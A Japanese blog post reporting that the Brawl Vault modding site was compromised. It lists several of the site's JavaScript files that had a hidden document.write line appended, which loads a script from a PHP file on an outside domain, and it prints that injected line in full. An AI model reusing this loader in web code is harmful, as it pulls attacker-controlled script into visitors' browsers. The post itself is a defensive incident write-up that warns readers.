追記
2014/01/18、改ざんされたファイル全てが元通りに修正されているのを確認。
もうアクセスしても心配なさそうです。

先程メインで使ってるFirefoxでBVを見てたら、いきなりこんな物騒な画面が出てアクセスブロックされた。

サブで使ってるCoolNovoもこんな感じでブロックされる。

ハックロムを快く思わない誰かのいたずら通報か？　と思ったけど
そうだと言い切れる自信がないので調べてみた。

とりあえず、CoolNovoのデバッガでアクセスログを取得。
すると…

BVの核となるJavaScriptファイルの複数から、
ihrhandwerk.deというドメインにあるファイル名が英数字の羅列のPHPにアクセスしている。

【注意】
この記事を投下した時点ではihrhandwerk.deにアクセスしても何も起こりませんが、
今後何を仕掛けられるかわかったもんじゃないので
興味本位でihrhandwerk.deにアクセスしないでください。

とりあえず適当に1つBVのJSを開いてみたら…。

script要素をdocument.writeするコードが
以下のスクリプト全てに挿入されとる。

• http://forums.kc-mm.com/Gallery/cookies.js
• http://forums.kc-mm.com/Gallery/get.js
• http://forums.kc-mm.com/Gallery/hackFunctions.js
• http://forums.kc-mm.com/Gallery/post.js
• http://forums.kc-mm.com/Gallery/youtube.js

いずれも、最後に以下のコードが追加されてるっぽい。

/* ランダムな英数字 */
document.write("<script src='http://www.ihrhandwerk.de/qmBrvcg6.php?id=129841940' type='text/javascript'></" + "script>");
/*/ ランダムな英数字 */

人力でこんな意味不なコメントを入れる訳ない。
どう見ても改ざんです本当にありがとうございました。

サーバーが安定しない*1上に今度は改竄ですか。。
コーティングもアレだし、ホントしっかりしてくれよBrawl Vaultさんよぅ…